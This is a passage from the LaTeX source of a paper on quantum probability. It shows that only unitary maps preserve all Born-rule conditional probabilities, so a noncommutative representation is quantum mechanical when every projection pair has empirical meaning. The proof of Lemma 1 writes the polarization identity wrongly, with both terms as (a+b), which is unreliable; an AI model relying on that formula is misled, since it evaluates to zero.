\varphi' &=& \left\{ \begin{array}{ll} 0 & \mbox{for}\ \vartheta = 0 \\ \varphi & \mbox{for}\ \vartheta \in (0,\pi) \\ \pi & \mbox{for}\ \vartheta = \pi \end{array} \right. \label{phi}\end{aligned}$$ and $r > 1$. Observe that $f$ is injective but not surjective: a spherical cap around the “North Pole” and “South Pole” is not in the image of $f$. It is easy to check that by these associations we obtain a noncommutative representation for the conditional probabilities (\[condprob\]):
[ccc]{} Operator assignment: && Born rule:\
------------------- ------------------- ------------------------------------------------------------------------------------------------------
Outcomes: $A^\pm$ $\longrightarrow$ $P^\pm_a = \frac{1}{2}(\UN \pm f({\bf a})\bm{\s})$ $\quad f({\bf a}) \in \RE^3, \, |f({\bf a})| = 1$
Pure state: $s$ $\longrightarrow$ $W_s = \frac{1}{2}(\UN + g({\bf s})\bm{\s})$ $\quad g({\bf s}) \in \RE^3, \, |g({\bf s})| > 1$
------------------- ------------------- ------------------------------------------------------------------------------------------------------
: A noncommutative but not quantum mechanical representation of the empirical conditional probabilities (\[condprob\])
&&
------------------------------------
$p^\pm_a = \mbox{Tr}(W_sP^\pm_a) $
------------------------------------
: A noncommutative but not quantum mechanical representation of the empirical conditional probabilities (\[condprob\])
\
The representation is a noncommutative but not a quantum mechanical representation since $W_s$ is not positive semidefinite and hence not a density operator. Note again that we have avoided Gleason’s theorem because we did not use the full Bloch sphere to represent measurement outcomes but only a “belt” defined by the angles (\[theta\])-(\[phi\]). To sum up, even though the set of measurements is uncountable, the noncommutative representation is not necessarily quantum mechanical since the set of projections representing the outcomes is not the full set of projections $\P_2$ of the Hilbert space $\H_2$.
[ ]{}However, (\[condprob\]) contains only the conditional probabilities of the spin measurement for *one* state. Can we apply the above technique of “pecking a hole” in the surface of the Bloch sphere and “pushing out” $s$ such that $W_s$ will not be a density operator in the case when we take into consideration *all states*? In other words, can we provide a noncommutative but not quantum mechanical representation for the full empirical content of the two-dimensional quantum mechanics? This was our second question above.
This is point where the representation of the set of conditional probabilities gets rigid. It will turn out that if one is to represent the conditional probability of *all* measurement outcomes of *all* spin measurement in *all* states, then there is no other noncommutative representation but the quantum mechanical. We prove it by the following lemma.
\[lemma 1\] Consider the Bloch sphere representation of spin. That is let ${\bf a}$ and ${\bf s}$ two unit vectors associated to the spin measurement $a$ and state $s$ of the system, respectively, such that the Born rule yields the conditional probabilities: $$\begin{aligned}
\label{condprob2}
\mbox{Tr}(W_sP^\pm_a) = \mbox{Tr}\left(\frac{1}{2}(\UN + {\bf s}\bm{\s})\frac{1}{2}(\UN \pm {\bf a}\bm{\s})\right) = \frac{1}{2}(1 \pm {\bf sa})\end{aligned}$$ Then, if there are two functions $$\begin{aligned}
&&f: S^2 \to S^2; \, {\bf a} \mapsto f({\bf a}) \\
&&g: S^2 \to \RE^3; \, {\bf s} \mapsto g({\bf s})\end{aligned}$$ such that all the conditional probabilities (\[condprob2\]) are preserved that is $$\begin{aligned}
{\bf as} = f({\bf a}) g({\bf s}) \label{scalar_prod_preserve1}\end{aligned}$$ for all ${\bf a}, {\bf s}\in S^2$, then
- $f$ and $g$ are the restrictions of the bijective linear maps $$\begin{aligned}
&&\hat f\colon \RE^3 \to \RE^3 \\
&&\hat g\colon \RE^3 \to \RE^3 \end{aligned}$$ to $S^2$, respectively;
- $\hat f$ is the orthogonal transformation;
- $\hat g = \hat f$.
For the proof of Lemma \[lemma 1\] see the Appendix.
[ ]{}Lemma \[lemma 1\] shows that there is no other transformation of the Bloch vectors which preserve all the empirical conditional probabilities encoded in the inner product but the orthogonal transformation. Consequently, one cannot avoid Gleason’s theorem and provide a counter-example of the above type in which the state is represented by a linear but not density operator.
In the rest of the section we prove that this result holds not only in $\H_2$ but in any $n$-dimensional Hilbert space. We show that one cannot preserve all the empirical conditional probabilities encoded in the inner product of the Hilbert space by other transformation than the unitary transformation. Thus, “compressing” the empirical content in a proper subset of $\P_n$ of a given Hilbert space is not a viable route to follow. If all the inner products of minimal projections have an empirical meaning, then the only way to represent them is via quantum mechanics.
\[lemma 2\] Let $\H$ be an $n$-dimensional Hilbert space and let $\P_n$ be the set of minimal projections in $\B(\H)\simeq M_n(\CO)$. If there are two functions $$\begin{aligned}
&&f:\P_n \to \P_n \\
&&g:\P_n \to M_n(\CO)\end{aligned}$$ such that $$\begin{aligned}
\mbox{Tr}(PQ) = \mbox{Tr}(f(P)g(Q)) \label{scalar_prod_preserve}\end{aligned}$$ for all $P, Q \in \P_n$, then
- $f$ and $g$ are the restrictions of the bijective linear maps $$\begin{aligned}
&&\hat f\colon M_n(\CO)\to M_n(\CO) \\
&&\hat g\colon M_n(\CO)\to M_n(\CO)\end{aligned}$$ to $\P_n$, respectively;
- $\hat f$ is unitary with respect to the inner product on $M_n(\CO)$ provided by the trace;
- $\hat g = \hat f$.
For the proof of Lemma \[lemma 2\] see again the Appendix.[^2]
Discussion
==========
Is quantum mechanics the only possible way to represent an empirically given set of classical conditional probabilities in a noncommutative way; or is this representation picked out from a broader set of representations by convention? Ultimately, this was the question we posed in this paper. To make this question precise, we specified a set of representations, called noncommutative representations, in which measurement choices and measurement outcomes were represented in the quantum fashion and the Born rule connecting the quantum probabilities to classical conditional probabilities was respected. We asked whether experience can ensure that this representation becomes not just partly but fully quantum mechanical, that is, the state will be represented by a density operator. Our answer was the following:
1. In case of finitely many measurements with finitely many outcomes the probability distribution of outcomes can always be given a noncommutative but not quantum mechanical representation.
2. In case of infinitely many measurements the probability distributions can be given a noncommutative but not quantum mechanical representation only if one can avoid Gleason’s theorem by not using all the projections of the Hilbert space in representing measurement outcomes.
3. If the physical situation is so complex that the inner product of any pair of minimal projections is of empirical meaning, then there exists no noncommutative representation which is not quantum mechanical. Thus, the quantum mechanical representation is not conventional.
The relation between point 2 and 3 is very subtle. It shows that simply the cardinality of the set of measurements does not decide on whether the situation can be given a noncommutative but not quantum mechanical representation. By “compressing” the projections representing measurement outcomes into a real subset of the full set of minimal projections of the given Hilbert space one can go beyond the quantum mechanical representation. The representation becomes rigid only if the inner product of any pair of minimal projections in a Hilbert space can be given an empirical content. This is the case for spin-half particles where projections can directly be associated to preparations and measurement directions. Whether one can provide a similar empirical account for the inner product of any pair of minimal projections in a Hilbert space of higher dimension, is a question which cannot be decided *a priori*.
Appendix {#appendix .unnumbered}
========
[ ]{}*Proof of Lemma \[lemma 1\].* (i) Let $\{{\bf e}_1,{\bf e}_2, {\bf e}_3\}\subset S^2$ be an orthonormal basis in $\RE^3$. Then due to (\[scalar\_prod\_preserve1\]) the sets $\{ f({\bf e}_1), f({\bf e}_2),f({\bf e}_3)\}$ and $\{ g({\bf e}_1), g({\bf e}_2),g({\bf e}_3)\}$ are biorthogonal: $$\begin{aligned}
(f({\bf e}_i),g({\bf e}_j))=\delta_{i,j} \quad i,j=1,2,3\end{aligned}$$ Biorthogonal sets with cardinality $d$ in $\RE^d$ form (in general two different) linear bases of $\RE^d$. Hence, if ${\bf a}=\sum_i\alpha_i{\bf e}_i\in S^2$ and $f({\bf a})=\sum_i\alpha_i^f f({\bf e}_i)\in\RE^3$ with $\alpha_i,\alpha_i^f\in\RE$, then $$\alpha_i=({\bf a},{\bf e}_i)=(f({\bf a}),g({\bf e}_i))=\sum_j\alpha_j^f(f({\bf e}_j),g({\bf e}_i))=\alpha_i^f,\quad i=1,2,3$$ Hence, $f(\sum_i\alpha_i{\bf e}_i)=\sum_i\alpha_if({\bf e}_i)$, that is $f$ is the restriction of the bijective linear map $\hat f$ characterized by the image linear basis $\{ f({\bf e}_1),f({\bf e}_2,f({\bf e}_3)\}$ of the orthonormal basis $\{ {\bf e}_1,{\bf e}_2,{\bf e}_3\}$. A similar argument shows that $g$ is the restriction of the bijective linear map $\hat g$ to $S^2$.
[ ]{}(ii) Using polarization identity $$\begin{aligned}
({\bf a},{\bf b})=\frac{1}{4}\big[({\bf a}+{\bf b},{\bf a}+{\bf b})-({\bf a}+{\bf b},{\bf a}+{\bf b})\big],\quad {\bf a},{\bf b}\in \RE^3\end{aligned}$$ it is enough to show that $$\begin{aligned}
({\bf a},{\bf a})=(\hat f({\bf a}),\hat f({\bf a})),\quad {\bf a} \in \RE^3\end{aligned}$$ which, however, holds since $$\begin{aligned}
1=({\bf a},{\bf a})=(f({\bf a}),f({\bf a}))=(\hat f({\bf a}),\hat f({\bf a})),\quad {\bf a} \in S^2\end{aligned}$$ and $\hat f$ is linear.
[ ]{}(iii) Using (\[scalar\_prod\_preserve1\]) and the orthogonality of $\hat f$ one has $$({\bf a},{\bf b})=(\hat f({\bf a}),\hat g({\bf b}))=({\bf a},\hat f^{-1}(\hat g({\bf b}))),\ {\bf a},{\bf b}\in \RE^3.$$ Hence, $\hat g=\hat f$ due to the uniqueness of the inverse map.
[ ]{}*Proof of Lemma \[lemma 2\].* (i) Since the trace is a faithful positive linear functional on $M_n(\CO)$, $$(A,B):=\mbox{Tr}(A^*B),\quad A,B\in M_n(\CO)$$ defines an inner product on the $n^2$-dimensional complex linear space $M_n(\CO)$. The real linear combinations of the projections in $\P_n$ span the real vector space of self-adjoint elements in $M_n(\CO)$, and the complex linear combinations span the complex vector space $M_n(\CO)$. Let $\{P_i, i=1,\dots, n^2\}\subset\P_n$ be a linear basis in $M_n(\CO)$. Then the inner product matrix $g\in M_{n^2}(\CO)$ given by matrix elements $g_{ij}:=(P_i,P_j)\geq 0$ is an invertible matrix. Since $\mbox{Tr}(f(P_i)g(P_j))=g_{ij}$ due to (\[scalar\_prod\_preserve\]) $\{f(P_i), i=1,\dots, n^2\}\subset\P_n$ and $\{g(P_i), i=1,\dots, n^2\}\subset M_n(\CO)$ are linear bases in $M_n(\CO)$ due to invertibility of $g$. Defining the bijective linear maps $\hat f,\hat g\colon M_n(\CO)\to M_n(\CO)$ by the linear extension of these image bases for $P=\sum_i\alpha_iP_i\in\P_n$ one has $$\begin{aligned}
(f(P),g(P_j))=(P,P_j)=(\sum_i\alpha_iP_i,P_j)=\sum_i\alpha_i(P_i,P_j) =\sum_i\alpha_i(f(P_i),g(P_j))\nonumber\\
=(\sum_i\alpha_if(P_i),g(P_j)) =:(\hat f(\sum_i\alpha_iP_i),g(P_j))=(\hat f(P),g(P_j)),\quad j=1,\dots, n^2.
\nonumber\end{aligned}$$ Hence, $f$ is the restriction of the bijective linear map $\hat f$ to $\P_n$, indeed. A similar argument shows that $g$ is the restriction of the bijective linear map $\hat g$ to $\P_n$.
[ ]{}(ii) Using polarization identity $$\begin{aligned}
(A,B)=\frac{1}{4}\big[(A+B,A+B)-(A-B,A-B)\big],\quad A,B\in M_n(\CO)\end{aligned}$$ it is enough to show unitarity on ‘diagonal’ inner products: $$\begin{aligned}
(A,A)=(\hat f(A),\hat f(A)),\quad A\in M_n(\CO)\end{aligned}$$ Since $f(\P_n)\subset \P_n$ by assumption, using the normalization $\mbox{Tr}(P)=1, P\in\P_n$ of the trace it follows that $$\begin{aligned}
(P,P)=1= (f(P),f(P)) = (\hat f(P), \hat f(P)),\ P\in\P_n\end{aligned}$$ i.e. $\hat f$ is unitary on diagonals from $\P_n$. Using a spectral decomposition of self-adjoint elements by orthogonal minimal projections one concludes that $\hat f$ maps the real vector space of self-adjoint elements in $M_n(\CO)$ into itself, moreover, it is unitary on diagonals from the space of self-adjoint elements. Since $A\in M_n(\CO)$ can be written uniquely as a sum of self-adjoint elements: $A=R+iI$ with $R:=(A+A^*)/2$ and $I:=(A-A^*)/2i$ it follows that $$\begin{aligned}
(A,A)&=&(R+iI,R+iI)=(R,R)+(I,I)=(\hat f(R),\hat f(R))+(\hat f(I),\hat f(I))\\
&=&(\hat f(R)+i\hat f(I),\hat f(R)+i\hat f(I)) = (\hat f(A),\hat f(A)),\end{aligned}$$ that is $\hat f$ is unitary on diagonals from $M_n(\CO)$, which provides unitarity of $\hat f$.
[ ]{}(iii) Using (\[scalar\_prod\_preserve\]) and unitarity of $\hat f$ one has $$(A,B)=(\hat f(A),\hat g(B))=(A,\hat f^{-1}(\hat g(B))),\ A,B\in M_n(\CO).$$ Hence, $\hat g=\hat f$ due to the uniqueness of the inverse map.
[**Acknowledgements.**]{} I thank Zalán Gyenis, Sam Fletcher and especially Péter Vecsernyés for valuable discussions. This work has been supported by the Hungarian Scientific Research Fund, OTKA K-115593.
References {#references .unnumbered}
==========
[ ]{}[ ]{}
G. Bana and T. Durt, ”Proof of Kolmogorovian Censorship,” *Found. Phys.*, **27**, 1355–1373. (1997).
G. Chiribella, G. M. D’Ariano and P. Perinotti, *Quantum Theory from First Principles*, (Cambridge: Cambridge University Press, 2017).
L. E. Szabó, ”Is quantum mechanics compatible with a deterministic universe? Two interpretations of quantum probabilities,” *Foundations of Physics Letters*, **8**, 417-436 (1995).
L. E. Szabó, ”Critical reflections on quantum probability theory,” in M. Rédei and M. Stöltzner (eds.) *John von Neumann and the Foundations of Quantum Physics*. (Institute Vienna Circle Yearbook. Dordrecht: Kluwer Academic Publishers, 201–219, 2001)
L. E. Szabó, “The Einstein-Podolsky-Rosen argument and the Bell inequalities,” *Internet Encyclopedia of Philosophy*, URL= http://www.iep.utm.edu/epr/ (2008).
G. M. D’Ariano, L. Maccone and M.G. A. Paris, “Quorum of observables for universal quantum estimation,” J. Phys. A, **34**, 93-103, 2001.
S. Gudder, *Quantum Probability*, (Academic Press, San Diego, 1988)
L. Hardy, “Quantum Theory From Five Reasonable Axioms,” arxiv.org/abs/quant-ph/0101012, 2008.
J. L. Park and W. Band, “The empirical determination of quantum states,” *Found. Phys.*, **1**, 133-144 (1970).
J. L. Park and W. Band, “A general theory of empirical state determination in quantum mechanics, Part I and Part II,” *Found. Phys.*, **1**, 211-226 and 339-357 (1971).
M. Rédei, ”Kolmogorovian Censorship Hypothesis for general quantum probability theories,” *Manuscrito - Revista Internacional de Filosofia*, **33**, 365–380 (2010).
M. Rédei and S. Summers ”Quantum probability theory,” *Stud. Hist. Phil. Mod. Phys.*, **38**, 390-417 (2007).
[^1]: Research Center for the Humanities, Budapest, Hungary; email: szabo.gabor@btk.mta.hu
[^2]: I thank Péter Vecsernyés for his help in proving both Lemma \[lemma 1\] and \[lemma 2\].
| 2023-09-27T01:27:15.642919 | https://example.com/article/7532 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.